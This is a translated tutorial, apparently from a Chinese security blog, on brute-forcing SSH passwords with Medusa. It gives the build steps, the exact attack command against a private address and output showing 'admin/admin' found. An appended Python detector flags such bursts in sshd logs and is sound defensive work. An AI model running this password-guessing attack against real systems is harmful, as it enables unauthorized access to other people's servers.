Remote SSH cracking

1. Software

OS: CentOS release 5.2 (Final) (check with cat /etc/issue)

Library: libssh2-1.2.7.tar.gz

medusa: medusa-2.0.tar.gz

2. Install libssh2-1.2.7

Copy libssh2-1.2.7.tar.gz to /tmp/, extract it to libssh2-1.2.7 and enter that directory:

2.1 ./configure

2.2 make

2.3 make install

3. Install medusa-2.0

Copy medusa-2.0.tar.gz to /tmp/, extract it to medusa-2.0 and enter that directory:

3.1 ./configure --build="i686-pc-linux" --enable-module-ssh=yes

3.2 make

3.3 make install

4. Set the LD_LIBRARY_PATH environment variable so that medusa can find the required shared library when cracking SSH

export LD_LIBRARY_PATH=/usr/local/lib

NOTE: if an error like the following appears at run time, the setting above usually fixes it:

IMPORTANT: Couldn't load "ssh" [libssh2.so.1: cannot open shared object file: No such file or directory].

5. Start cracking SSH

After copying the dictionaries (e.g. brute.dic, p.dic) to /tmp/, enter /tmp/ and type medusa to see the help text; from that you can start cracking SSH. E.g. (assume the target IP we want to crack is 192.168.10.126):

[root@CentOS2 tmp]# medusa -h 192.168.10.126 -U brute.dic -P p.dic -t 7 -f -r 10 -M ssh

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: adidas (123 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (124 of 4086 complete)

ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: access (125 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: accident (126 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: across (127 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: adam (128 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: admin (129 of 4086 complete)

ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 2 complete) Password: Admin (130 of 4086 complete)

When "ACCOUNT FOUND" appears, the crack has succeeded; in the example above the cracked username is admin and the password is admin.
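Seen from the server, a run like the one above lands in sshd's auth log as a burst of "Failed password" lines from one address, typically followed by an "Accepted password" line for the account that was found. The following Python is an added detection example and is not part of the original post; the log lines, the source addresses (192.168.10.10 and 192.168.10.50) and the threshold of five failures per minute are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
# Constructed sample sshd lines (CentOS-style syslog); 192.168.10.10 is a
# made-up scanner address. Syslog omits the year, so one is assumed below.
SAMPLE_LOG = """\
Jun  1 10:00:01 CentOS2 sshd[2001]: Failed password for admin from 192.168.10.10 port 40001 ssh2
Jun  1 10:00:01 CentOS2 sshd[2002]: Failed password for admin from 192.168.10.10 port 40002 ssh2
Jun  1 10:00:02 CentOS2 sshd[2003]: Failed password for admin from 192.168.10.10 port 40003 ssh2
Jun  1 10:00:02 CentOS2 sshd[2004]: Failed password for invalid user root from 192.168.10.10 port 40004 ssh2
Jun  1 10:00:02 CentOS2 sshd[2005]: Failed password for admin from 192.168.10.10 port 40005 ssh2
Jun  1 10:00:03 CentOS2 sshd[2006]: Accepted password for admin from 192.168.10.10 port 40006 ssh2
Jun  1 10:05:00 CentOS2 sshd[2100]: Failed password for bob from 192.168.10.50 port 50001 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3})\s+(\d+) (\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def parse(line, year=2024):
    """Return (timestamp, outcome, user, source_ip) or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    mon, day, clock, outcome, user, ip = m.groups()
    ts = datetime.strptime(f"{year} {mon} {day} {clock}", "%Y %b %d %H:%M:%S")
    return ts, outcome, user, ip

def detect(lines, threshold=5, window_s=60):
    """Flag a source at `threshold` failures within `window_s` seconds, then any accepted login from it."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    flagged, alerts = set(), []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, outcome, user, ip = rec
        if outcome == "Failed":
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("BRUTE_FORCE", ip, user, ts))
        elif ip in flagged:
            alerts.append(("SUCCESS_AFTER_BRUTE_FORCE", ip, user, ts))
    return alerts
```

Running detect(SAMPLE_LOG.splitlines()) yields one BRUTE_FORCE alert for 192.168.10.10 and one SUCCESS_AFTER_BRUTE_FORCE alert for the admin login from that address; the single failure from 192.168.10.50 stays below the threshold.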

This article is excerpted from the 独自等待 blog and was collected and organized by the Information Security Group of the Network Security Offense and Defense Lab (www.91ri.org).